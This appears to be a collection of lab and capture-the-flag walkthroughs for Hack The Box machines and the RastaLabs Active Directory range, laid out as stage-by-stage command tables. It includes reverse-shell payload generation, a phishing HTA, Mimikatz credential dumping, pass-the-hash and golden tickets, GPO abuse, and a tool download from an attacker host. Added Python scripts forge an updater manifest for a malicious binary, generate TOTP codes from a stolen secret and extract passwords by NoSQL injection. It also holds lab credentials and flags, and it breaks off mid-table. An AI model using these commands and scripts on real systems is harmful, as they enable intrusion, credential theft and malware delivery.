Network Scenarios
LLMNR Poisoning->AS-REP Roast->ForceChangePassword->GenericWrite->Password Spraying->RunForrestRun.exe->Abusing Vulnerable GPO->Abusing MSSQL Service Database->Abusing Domain Trusts
Service Permission->ForceChangePassword->Abuse ACLs->Abuse SQL Instance->Abuse Service->pass the ticket->golden ticket
AlwaysInstallElevated->constrained delegation->unconstrained delegation + printer bug->cross trust->Abuse MSSQL Service
Bypass AMSI->AlwaysInstallElevated->constrained delegation->Pass the ticket->Abuse SQL Instance->Abuse GPO->DCSync Attack

ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Enumeration | Online search for lab IP range | N/A |
2 | Enumeration | Port scanning with masscan | masscan -p 80,135,139,445,443 -sT 10.10.110.0/24 -e tun0 |
3 | Enumeration | Detailed host scanning with nmap | nmap (specific commands not provided) |
4 | Enumeration | Finding domain names with crackmapexec | crackmapexec (specific commands not provided) |
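Going from the masscan sweep above to the detailed per-host nmap scan is mechanical, so here is an added example (not code from the original page) that does it: it parses masscan's `-oL` list output, which the sweep above would need to be run with, deduplicates the hits and emits one `nmap -sC -sV` command per host restricted to the discovered ports. The sample output embedded in the block is constructed; the hosts and ports in it are made up.

```python
"""Added example, not from the page: turn a masscan sweep into the per-host
nmap -sC -sV scans that follow it. Assumes masscan was run with -oL (list
output); the sample below is constructed, not real lab data."""
import re
from collections import defaultdict

# Constructed masscan -oL output: one "open <proto> <port> <ip> <timestamp>" per hit.
SAMPLE_MASSCAN_OL = """\
#masscan
open tcp 445 10.10.110.5 1600000000
open tcp 139 10.10.110.5 1600000001
open tcp 80 10.10.110.10 1600000002
open tcp 443 10.10.110.10 1600000002
open tcp 135 10.10.110.5 1600000003
open tcp 445 10.10.110.5 1600000004
# end
"""

LINE_RE = re.compile(r"^open\s+(tcp|udp)\s+(\d+)\s+(\S+)\s+\d+$")


def parse_masscan_list(text):
    """Return {ip: sorted [(proto, port), ...]}; skips comment, blank and
    banner lines and collapses duplicate hits (masscan retransmits)."""
    hosts = defaultdict(set)
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            proto, port, host = m.group(1), int(m.group(2)), m.group(3)
            hosts[host].add((proto, port))
    return {h: sorted(p) for h, p in hosts.items()}


def _ip_key(host):
    return tuple(int(x) for x in host.split("."))


def nmap_commands(hosts, outdir="nmap"):
    """One nmap line per host, limited to the ports masscan found. UDP hits
    add -sS -sU and use nmap's T:/U: port-spec syntax."""
    cmds = []
    for host in sorted(hosts, key=_ip_key):
        tcp = [str(p) for proto, p in hosts[host] if proto == "tcp"]
        udp = [str(p) for proto, p in hosts[host] if proto == "udp"]
        parts = []
        if tcp:
            parts.append("T:" + ",".join(tcp))
        if udp:
            parts.append("U:" + ",".join(udp))
        flags = "-sC -sV" + (" -sS -sU" if udp else "")
        cmds.append(f"nmap {flags} -p {','.join(parts)} -oA {outdir}/{host} {host}")
    return cmds


if __name__ == "__main__":
    for cmd in nmap_commands(parse_masscan_list(SAMPLE_MASSCAN_OL)):
        print(cmd)
```

Run `masscan ... -oL sweep.txt` first, then feed the file to `parse_masscan_list`; the generated commands keep the `-oA` naming the later tables use, one output set per host.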

ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Recon | Nmap scanning | nmap -sC -sV -oA nmap/result 10.10.10.210 |
2 | Enumeration | Gobuster directory scanning | gobuster dir -u https://10.10.10.210 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -k -t 50 |
3 | Credential Harvesting | Gathering usernames | Gather usernames manually and create a user.txt file |
4 | Credential Harvesting | Password spraying | python3 atomizer.py owa 10.10.10.210 pass.txt user.txt -i 0:0:01 |
5 | Phishing | Sending phishing emails | Use Outlook to send phishing emails and capture NTLMv2 hash with Responder |
6 | Hash Cracking | Cracking NTLMv2 hash | hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt --force |
7 | Access | PowerShell remote session | $offsec_session = New-PSSession -ComputerName 10.10.10.210 -Authentication Negotiate -Credential k.svensson |
8 | Privilege Escalation | Creating an NTFS junction into the Administrator profile | New-Item -ItemType Junction -Path 'C:\ProgramData\root' -Target 'C:\Users\Administrator' |
9 | Privilege Escalation | Reading root.txt through the junction with the available Check-File command | Check-File C:\programdata\root\Desktop\root.txt |
10 | Tool Transfer | Downloading nc.exe into a writable directory | iwr -uri http://10.10.xx.xx/nc.exe -o 'C:\Windows\System32\spool\drivers\color\nc.exe' |

ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Recon | Nmap scanning | nmap -sC -sV -oA nmap/result 10.10.10.211 |
2 | Web Enumeration | Checking server with Wappalyzer | Use Wappalyzer to identify backend technologies |
3 | Web Enumeration | Analyzing .git directory | Check the Gemfile in the .git directory for Ruby and Gem versions |
4 | Exploitation | Exploiting Ruby on Rails | Use a Ruby on Rails exploit |
5 | Post-Exploitation | Capturing request in Burp | Capture the request and modify it with the exploit |
6 | Post-Exploitation | Getting a reverse shell | Use netcat listener and send the exploit to get a reverse shell |
7 | Privilege Escalation | Cracking password hashes | Use John the Ripper to crack password hashes found in /var/backups |
8 | Privilege Escalation | Generating TOTP codes from .google_authenticator | Use the base32 secret on the first line of .google_authenticator to generate valid one-time codes (the remaining numeric lines are single-use scratch codes) |
9 | Privilege Escalation | Synchronizing time so the codes validate | TOTP codes depend on the clock: set the attacker's time and timezone to match the target's before generating codes |
10 | Privilege Escalation | Gaining root access with GTFOBins | sudo gem open -e "/bin/sh -c /bin/sh" rdoc to gain root access |
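Steps 8 and 9 above hinge on how TOTP works, so here is an added example, not code from the page, that reads a .google_authenticator file and produces the codes for a window of 30-second steps around a chosen time. The file contents embedded below are constructed around the RFC 6238 test key (the ASCII string 12345678901234567890 in base32), not a secret from the target.

```python
"""Added example, not from the page: generate the codes the google-authenticator
PAM module expects from the base32 secret in ~/.google_authenticator, for a
window of 30-second steps around a chosen time. The file contents below are
constructed around the RFC 6238 test key, not a secret from the target."""
import base64
import hashlib
import hmac
import struct
import time

# Constructed ~/.google_authenticator: secret first, '" ' option lines, then
# single-use scratch codes.
SAMPLE_FILE = """\
GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ
" RATE_LIMIT 3 30
" WINDOW_SIZE 17
" DISALLOW_REUSE
" TOTP_AUTH
11111111
22222222
"""


def parse_google_authenticator(contents):
    """Return (base32 secret, [scratch codes]). Lines starting with '"' are
    module options; WINDOW_SIZE says how many neighbouring codes are accepted."""
    secret, scratch = None, []
    for line in contents.splitlines():
        line = line.strip()
        if not line or line.startswith('"'):
            continue
        if secret is None:
            secret = line
        else:
            scratch.append(line)
    return secret, scratch


def totp(secret_b32, t, step=30, digits=6):
    """RFC 6238 TOTP (HMAC-SHA1) for unix time t; counter = floor(t / step)."""
    key = base64.b32decode(secret_b32.upper() + "=" * (-len(secret_b32) % 8))
    counter = int(t // step)
    mac = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp_window(secret_b32, t, steps=1, step=30):
    """Codes for counters -steps..+steps around t. Small skew between attacker
    and target clocks is absorbed by the module's window; a clock that is hours
    out (wrong timezone, unsynced VM) is not, hence the time-sync step."""
    return [totp(secret_b32, t + i * step, step=step) for i in range(-steps, steps + 1)]


if __name__ == "__main__":
    secret, scratch = parse_google_authenticator(SAMPLE_FILE)
    print("codes around now:", totp_window(secret, time.time()))
    print("scratch codes:", scratch)
```

If every generated code is rejected, compare `date -u` on both machines before suspecting the secret: the codes are a pure function of the key and the current 30-second counter.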

ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Recon | Nmap scanning | nmap -sV -sC -oN nmap 10.10.10.237 |
2 | File Analysis | Analyzing the installer | file "heedv1 Setup 1.0.0.exe" |
3 | SMB Enumeration | Enumerating SMB shares | smbclient -L //10.10.10.237 |
4 | SMB File Transfer | Downloading files via SMB | smbclient //10.10.10.237/Software_Updates then get UAT_Testing_Procedures.pdf |
5 | Exploitation | Crafting malicious binary | msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.30 LPORT=9001 -f exe -o "r'sp00f.exe" |
6 | Manifest Creation | Creating the latest.yml the updater reads | Write a latest.yml whose path points at the crafted binary and whose sha512 field is the base64 SHA-512 of that file, with a version above the installed 1.0.0 |
7 | SMB File Transfer | Uploading the manifest via SMB | smbclient //10.10.10.237/Software_Updates then put latest.yml (the crafted exe must be reachable at the path the manifest names) |
8 | Reverse Shell | Catching the reverse shell | Use a Metasploit multi/handler (or nc -lvnp 9001, since windows/shell_reverse_tcp is unstaged) to listen for the reverse shell |
9 | Redis Exploitation | Exploiting Redis | redis-cli -h 10.10.10.237 then get pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0 |
10 | Password Decryption | Decrypting password | python3 decrypt.py with the script provided in the summary |
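Step 6 above only says the latest.yml is created by hand; the following added example (not from the page) shows what the updater manifest has to contain and checks a manifest against a binary. The field names (version, files[].url/sha512/size, path, sha512, releaseDate) are electron-builder's update-manifest format and the sha512 value is base64 of the raw digest rather than hex. The binary name repeats the page's r'sp00f.exe; the version 1.0.1 and the file contents are assumptions (the updater only acts on a version above the installed 1.0.0).

```python
"""Added example, not from the page: write the latest.yml that electron-updater
fetches from the update location, and check a manifest against a binary. Field
names are electron-builder's; sha512 is base64 of the raw digest, not hex.
File name and version are assumptions (1.0.1 is above the page's 1.0.0)."""
import base64
import hashlib
import json
from datetime import datetime, timezone


def sha512_b64(data):
    """electron-updater compares base64(SHA-512(file)), so hash the exact bytes served."""
    return base64.b64encode(hashlib.sha512(data).digest()).decode()


def build_latest_yml(binary_name, binary_bytes, version):
    digest = sha512_b64(binary_bytes)
    stamp = datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%S.000Z")
    name = json.dumps(binary_name)  # a JSON string is a valid YAML double-quoted scalar
    return (
        f"version: {version}\n"
        "files:\n"
        f"  - url: {name}\n"
        f"    sha512: {digest}\n"
        f"    size: {len(binary_bytes)}\n"
        f"path: {name}\n"
        f"sha512: {digest}\n"
        f"releaseDate: '{stamp}'\n"
    )


def manifest_matches(yml_text, binary_bytes):
    """True when the top-level sha512 in the manifest matches the binary; an
    updater that trusts this field alone installs whatever the share offers."""
    for line in yml_text.splitlines():
        if line.startswith("sha512: "):
            return line.split(": ", 1)[1].strip() == sha512_b64(binary_bytes)
    return False


if __name__ == "__main__":
    with open("r'sp00f.exe", "rb") as f:  # the msfvenom output from step 5
        payload = f.read()
    yml = build_latest_yml("r'sp00f.exe", payload, "1.0.1")
    assert manifest_matches(yml, payload)
    with open("latest.yml", "w") as f:
        f.write(yml)
```

Regenerate the manifest whenever the binary is rebuilt: a stale sha512 makes the updater discard the download rather than run it.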

ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Data Analysis | Reading the capture file | Use NetworkMiner to open the .dmp capture and extract the secret file |
2 | Cryptography | Decrypting the flag | Use the FileCryptography.psm1 PowerShell module, which provides Unprotect-File |
3 | File Preparation | Preparing files for decryption | Rename the secret file to secret.txt.AES on ws04 |
4 | Key Conversion | Converting key for decryption | $key = Get-Content key.txt \| ... (rest of the pipeline missing from the source) |
5 | File Decryption | Decrypting the file | Unprotect-File '.\secret.txt.AES' -Algorithm AES -Key $key |
6 | Flag Retrieval | Retrieving the flag | The flag is RASTA{cryp70_3xf1l7r4710n} |

ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Credential Dumping | Enumerating credentials on WS02 | Get-ChildItem C:\Users\epugh\AppData\Local\Microsoft\Credentials\ -force |
2 | Credential Dumping | Using Mimikatz to dump creds | Upload mimikatz.exe and execute sekurlsa::dpapi to get the master key |
3 | Credential Decryption | Decrypting credentials | dpapi::cred /in:C:\users\epugh\AppData\Local\Microsoft\Credentials\936A68B5AC87C545C4A22D1AF264C8E9 /masterkey:40fc84... |
4 | Port Forwarding | Setting up port forwarding | portfwd add -L 10.10.14.83 -r 10.10.122.15 -l 3389 -p 3389 |
5 | RDP Connection | Connecting via RDP with Remmina | Install Remmina, import sql01.rdp , change host, export to .rdp file |
6 | RDP Connection | Using xfreerdp to connect | xfreerdp sql.rdp /u:epugh_adm /d:rastalabs.local |
7 | Flag Retrieval | Retrieving the flag | The flag is RASTA{c00k1n6_w17h_645_n0w} |

ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Credential Enumeration | Finding LAPS readers | Enumeration shows ngodfrey_adm is a member of the group allowed to read the LAPS password of WS05 |
2 | Credential Access | Loading PowerSploit | powershell -ep bypass then Import-Module ./PowerSploit.psd1 |
3 | Credential Access | Building a credential object | $SecPassword = ConvertTo-SecureString 'J5KCwKruINyCJBKd1dZU' -AsPlainText -Force then $cred = New-Object System.Management.Automation.PSCredential('rastalabs.local\ngodfrey_adm', $SecPassword) |
4 | Credential Access | Getting AD object with credentials | Get-ADObject -Name web01 -DomainController 10.10.120.1 -Credential $Cred |
5 | Local Admin Passwords | Retrieving local admin passwords | Passwords are listed for WS01, WS02, WS03, WS04, WS05 |
6 | Port Forwarding | Setting up port forwarding with Meterpreter | portfwd add -L 10.10.14.83 -r 10.10.121.101 -l 447 -p 445 and similar for other ports |
7 | Exploitation | Using MS17-010 exploit for admin shell | exploit/windows/smb/ms17_010_psexec with lport 80, 443, 8080 |
8 | Flag Retrieval | Retrieving flags from WS02 and WS04 | Flags are RASTA{3v3ryb0dy_l0v35_l4p5} , RASTA{wh3r3_w45_2f4_!?} , RASTA{50m371m35_y0u_mu57_b4ck7r4ck} |
9 | Post-Exploitation | Running Mimikatz on WS02 | privilege::debug then sekurlsa::logonPasswords |
10 | File Permissions | Granting read access to the flag | icacls flag.txt /grant administrator:F or icacls flag.txt /grant RLAB\ahope:F |

ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Privilege Escalation | AS-REP Roasting | Import-Module ./asreproast.ps1 then Invoke-ASREPRoast -Domain rastalabs.local -Server 10.10.120.1 \| select -expand hash |
2 | Hash Extraction | Saving the hash | Copy the hash into a text file saved with UTF-8 encoding |
3 | Wordlist Creation | Keyboard-walk wordlist with kwprocessor | ./kwp -z basechars/full.base keymaps/en-us.keymap routes/2-to-16-max-3-direction-changes.route > kwp3.txt |
4 | Password Cracking | Using John the Ripper | Crack the AS-REP hash with John the Ripper (jumbo) against kwp3.txt |
5 | Credential Use | Mounting the user's home share | net use H: \\fs01.rastalabs.local\home$\ngodfrey /user:ngodfrey "zaq123$%^&*()_+" |
6 | Flag Retrieval | Accessing the flag | The flag is RASTA{k3rb3r05_15_7r1cky} |

ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Enumeration | Viewing shares on fs01 | net view \\fs01 /all |
2 | Enumeration | Using PowerSploit for enumeration | powershell -ep bypass then Import-Module ./PowerSploit.psd1 then Get-NetShare \\fs01 |
3 | Flag Retrieval | Accessing open shares | Flag is RASTA{ju1cy_1nf0_1n_0p3n_5h4r35} |

ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Phishing | Creating phishing HTA | python unicorn.py windows/meterpreter/reverse_https 10.10.14.83 443 hta |
2 | Web Server Setup | Hosting the HTA on Apache2 | cp index.html launcher.hta /var/www/html then service apache2 start |
3 | Listener Setup | Setting up Metasploit listener | msfconsole -r unicorn.rc |
4 | Share Enumeration | Viewing shares on the network | net share ; net view ; net use K: \\hostname\share$ ; net view \\hostname /all |
5 | User Enumeration | Displaying domain user accounts | net user /domain |
6 | User Information | Viewing user info | net user [username] /domain |
7 | Group Enumeration | Viewing domain group members | net group finance /domain |
8 | Drive Enumeration | Listing logical drives | fsutil fsinfo drives ; wmic logicaldisk get name ; diskpart then list volume |
9 | Network Recon | Resolving server names to IP addresses | ping DC01 ; ping FS01 ; ping MX01 ; ping NIX01 ; ping SQL01 ; ping WS01 ; ping WS02 ; ping WS03 ; ping WS05 |
10 | Flag Retrieval | Accessing the flag | Flag is RASTA{w007_f007h0ld_l375_pwn} |
11 | KeePass Database | Found KeePass database and key file | Located in M:\Documents |

ID | Stage | Techniques | Commands |
---|---|---|---|
1 | User Enumeration | Finding user directory on fs01 | net user ahope /domain |
2 | Network Drive Mount | Mounting network drive to access file | net use Q: \\fs01.rastalabs.local\home$\ahope /user:ahope "Labrador8209" |
3 | File Conversion | Converting .ppk to OpenSSH format | puttygen nix01.ppk -O private-openssh -o nix |
4 | Network Configuration | Adding a route and running a SOCKS4a proxy through ws01 | Commands for adding the route and starting the socks4a proxy on ws01 are not provided in the source |
5 | SSH Connection | Connecting via SSH through proxychains | proxychains ssh -i nix ahope@<nix01 address> |
6 | Privilege Escalation | Using exploit for privilege escalation | Compile exploit with gcc exp1.c -o exploit |
7 | File Transfer | Transferring the exploit to the target | proxychains scp -i nix -r exploit ahope@<nix01 address>:/home/ahope |
8 | File Download | Pulling a file back from the target | proxychains scp -i nix ahope@<nix01 address>:/usr/local/sbin/paycalc /root/Desktop/rasta |
9 | Flag Retrieval | Retrieving the flag | Flag is RASTA{y0ur3_4_b4ll3r_70_637_7h15} |

ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Port Forwarding | Forwarding port to ws01 | portfwd add -L 10.10.14.83 -r 10.10.121.100 -l 445 -p 445 |
2 | Remote Execution | Using Metasploit psexec for shell | Use msf psexec to get a shell on ws01 |
3 | Remote Execution | Using Impacket psexec for shell | Use Impacket psexec to get a shell on ws01 , add route in meterpreter |
4 | Proxy Configuration | Setting SOCKS4a proxy in Metasploit | Set socks4a proxy in msf, then edit /etc/proxychains.conf |
5 | Enumeration | Using CrackMapExec to enumerate | proxychains crackmapexec 10.10.120.1 -u rweston_da -H <hash> --ntds drsuapi |
6 | Hash Dumping | Dumping hashes | Dump hashes with CrackMapExec and proxychains |
7 | Credential Access | Accessing vault with Mimikatz | Use Mimikatz on ws01 to access vault credentials |
8 | Credential Decryption | Decrypting credentials | dpapi::cred /in:C:\users\rweston\AppData\Local\Microsoft\Credentials\<hash> /masterkey:<masterkey> |
9 | Impersonation | Impersonating user with Incognito | In meterpreter, load incognito and impersonate rweston |
10 | Clipboard Monitoring | Monitoring clipboard for credentials | Transfer shell to Empire and monitor clipboard |
11 | RDP Connection | Connecting via RDP with credentials | xfreerdp /u:epugh_adm /p:IReallyH8LongPasswords! /v:10.10.110.10 |
12 | Flag Retrieval | Retrieving the flag | Flag is RASTA{c4r3ful_h0w_y0u_h4ndl3_cr3d5} |

ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Port Forwarding | Forwarding port to ws05 | portfwd add -L 10.10.14.83 -r 10.10.123.102 -l 445 -p 445 |
2 | Credential Use | Using rweston_da hash | rweston_da hash --- ab7b75ff84475be2e8c4dcb7390955c3:3ff61fa259deee15e4042159d7b832fa |
3 | Exploitation | Exploit via smb/psexec | Use the hash with smb/psexec to exploit |
4 | Flag Retrieval | Retrieving the flag | Flag is RASTA{53rv1c3_4bu53_f7w} |

ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Credential Use | Using epugh_adm credentials | Log in to web01 (10.10.110.10) and then RDP to sql01 (10.10.122.15) using epugh_adm creds |
2 | Lateral Movement | RDP to fs01 with gopikrishna | RDP to fs01 with user gopikrishna [local admin] |
3 | Malware Execution | Running p0wnedshell.exe | Run p0wnedshell.exe with admin cmd |
4 | Credential Dumping | Invoke Mimikatz from p0wnedshell | Use option 4 in p0wnedshell , invoke Mimikatz to get rweston_da NTLM hash |
5 | Credential Use | Pass-the-hash with Mimikatz | sekurlsa::pth /user:rweston_da /domain:rastalabs.local /ntlm:3ff61fa259deee15e4042159d7b832fa |
6 | Golden Ticket Attack | Perform DCSync to get krbtgt hash | Use option 10 in p0wnedshell , perform DCSync |
7 | Golden Ticket Attack | Generate golden ticket | kerberos::golden /domain:rastalabs.local /user:rweston_da /sid:S-1-5-21-1396373213-2872852198-2033860859 /krbtgt:1b6e14bc52b67a2357f7938a8bbceb1b /ticket:C:\Users\GOPIKR~1\Desktop\rweston_da.ticket |
8 | Golden Ticket Attack | Use golden ticket | kerberos::ptt C:\Users\GOPIKR~1\Desktop\rweston_da.ticket |
9 | Flag Retrieval | Accessing the flag | pushd \\dc01.rastalabs.local\C$ then read the flag: RASTA{r4574l4b5_ch4mp10n} |

ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Initial Access | Using epugh_adm credentials | Log in to web01 (10.10.110.10) |
2 | Lateral Movement | RDP to sql01 with epugh_adm creds | Take RDP of sql01 (10.10.122.15) using epugh_adm credentials |
3 | Database Access | Start SQL Management Studio | Start SQL Management Studio and connect via Windows authentication |
4 | Database Querying | Listing tables in the umbraco database | USE umbraco; SELECT TABLE_NAME FROM umbraco.INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE' |
5 | Flag Retrieval | Retrieving the flag from the database | SELECT * FROM Flag ; flag is RASTA{d474b4535_4r3_u5u4lly_1n73r3571n6} |

ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Credential Use | Logging in to web01 with epugh_adm credentials | cmdkey /generic:TERMSRV/web01 /user:epugh_adm /pass:[password] then mstsc /v:web01 (mstsc has no /u or /p switches; it picks up the credential stored by cmdkey) |
2 | Lateral Movement | RDP to sql01 using epugh_adm | cmdkey /generic:TERMSRV/sql01 /user:epugh_adm /pass:[password] then mstsc /v:sql01 |
3 | GPO Enumeration | Enumerating GPO permissions | Get-NetGPO \| ... (this and the other PowerView pipelines below are cut off after the pipe in the source) |
4 | Group Membership | Checking epugh_adm's group membership | net user epugh_adm /domain |
5 | GPO Permission | Finding a GPO with weak permissions | Get-NetGPO -ComputerName fs01.rastalabs.local \| ... |
6 | OU Enumeration | Finding the OU the policy is linked to | Get-NetOU -GUID "{DCE628BF-341C-4503-8181-3B8865700F6A}" \| ... |
7 | Policy Enumeration | Identifying the policy applied to fs01 | Get-NetGPO -ComputerName fs01.rastalabs.local \| ... |
8 | GPO Abuse | Creating a user and adding it to local Administrators via immediate scheduled tasks | New-GPOImmediateTask -TaskName gop12i -GPODisplayName "Test GPO" -CommandArguments 'net user gopikrishna Ramco@12345 /add' -Force then New-GPOImmediateTask -TaskName gopi131 -GPODisplayName "Test GPO" -CommandArguments 'net localgroup Administrators gopikrishna /add' -Force |
9 | File Permissions | Granting Administrators access to flag.txt | icacls flag.txt /grant administrators:F |
10 | Flag Retrieval | Retrieving the flag | Flag is RASTA{6p0_4bu53_15_h4rdc0r3} |

ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Initial Recon | Nmap scan | nmap -sC -sV 10.10.10.197 |
2 | DNS Enumeration | Brute-force subdomains | ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://sneakycorp.htb/ -H "Host: FUZZ.sneakycorp.htb" -fs 185 |
3 | Email Gathering | Extract emails | Extract emails from http://sneakycorp.htb/team.php to mails.txt |
4 | Phishing | Send phishing emails | Use swaks to send emails to addresses in mails.txt |
5 | Credential Harvesting | Decode credentials | Use Burp Suite to decode credentials from intercepted traffic |
6 | Email Client Setup | Configure email client | Set up Evolution with the SMTP server and the <user>@sneakycorp.htb credentials decoded in the previous step |
7 | FTP Access | Access FTP | ftp 10.10.10.197 with credentials obtained |
8 | Reverse Shell | Upload and trigger reverse shell | Upload rev.php via FTP and trigger with curl |
9 | Privilege Escalation | Add SSH key to authorized keys | Add generated SSH key to /home/low/.ssh/authorized_keys via malicious package |
10 | Sudo Exploitation | Exploit sudo permissions | Use sudo /usr/bin/pip3 to install a malicious package whose setup.py spawns a reverse shell |

ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Port Scanning | Masscan and Nmap | masscan -p1-65535,U:1-65535 10.10.10.162 --rate=1000 -e tun0 then nmap [options] [target] |
2 | Web Enumeration | Checking web ports | Access web service on ports 80 and 443 |
3 | SSL Certificate | Viewing certificate | View SSL certificate details |
4 | Host File Editing | Adding VHOST to hosts file | Edit /etc/hosts to add staging-order.mango.htb |
5 | NoSQL Injection | Bypassing login | Use Burp Suite to intercept and modify request for NoSQL injection |
6 | Data Extraction | Automating credential extraction | Run Python script to extract credentials for admin and mango users |
7 | SSH Connection | Accessing SSH | SSH into the server using extracted credentials |
8 | User Flag Access | Retrieving user flag | Use su to login as admin and retrieve user flag |
9 | Privilege Escalation | Exploiting SUID file | Use SUID file to read root flag or exploit for root access |
10 | Root Flag Access | Reading root flag | Run binary or use jjs to read root flag |
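Step 6 of the table above says "run a Python script to extract credentials"; the following added example (not the page's script) shows the character-by-character $regex extraction such a script performs. `fake_login` is a local stand-in for a login handler that feeds the JSON body straight into a MongoDB query; against a live target it would be replaced by a function that POSTs the same JSON to the login form and returns True on a successful-login response. The users and passwords embedded in the block are constructed.

```python
"""Added example, not from the page: regex-driven credential extraction through
a NoSQL injection. `fake_login` simulates a handler that passes request JSON
into db.users.findOne({username: u, password: p}), so {"$regex": ...} in the
password field becomes a regex match on the stored value. The user data is
constructed; swap `fake_login` for an HTTP oracle against a real target."""
import re
import string

# Constructed backing data standing in for the users collection.
FAKE_USERS = {"admin": "Adm1n!P@ss{$x}", "mango": "m4ngo.pw^2"}


def fake_login(username, password):
    """Simulated vulnerable login: a dict carrying $regex is honoured as an
    operator instead of being compared as a literal password."""
    stored = FAKE_USERS.get(username)
    if stored is None:
        return False
    if isinstance(password, dict) and "$regex" in password:
        return re.search(password["$regex"], stored) is not None
    return stored == password


def extract_password(username, oracle, alphabet=string.printable.strip()):
    """Grow a known prefix one character at a time with anchored regexes.
    Each candidate is re.escape'd so metacharacters in the real password
    ('.', '$', '{', '^') are matched literally. Returns (password, queries)."""
    known = ""
    queries = 0
    while True:
        queries += 1
        # ^prefix$ only succeeds once the prefix is the whole password.
        if oracle(username, {"$regex": "^" + re.escape(known) + "$"}):
            return known, queries
        for ch in alphabet:
            queries += 1
            if oracle(username, {"$regex": "^" + re.escape(known + ch)}):
                known += ch
                break
        else:
            raise RuntimeError(f"no character matched after {known!r}; widen the alphabet")


if __name__ == "__main__":
    for user in FAKE_USERS:
        pw, n = extract_password(user, fake_login)
        print(f"{user}:{pw} ({n} oracle queries)")
```

The request count is returned so the extraction can be tuned: ordering the alphabet by expected frequency (lowercase first, punctuation last) cuts the number of requests sent to a rate-limited target.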

ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Reconnaissance |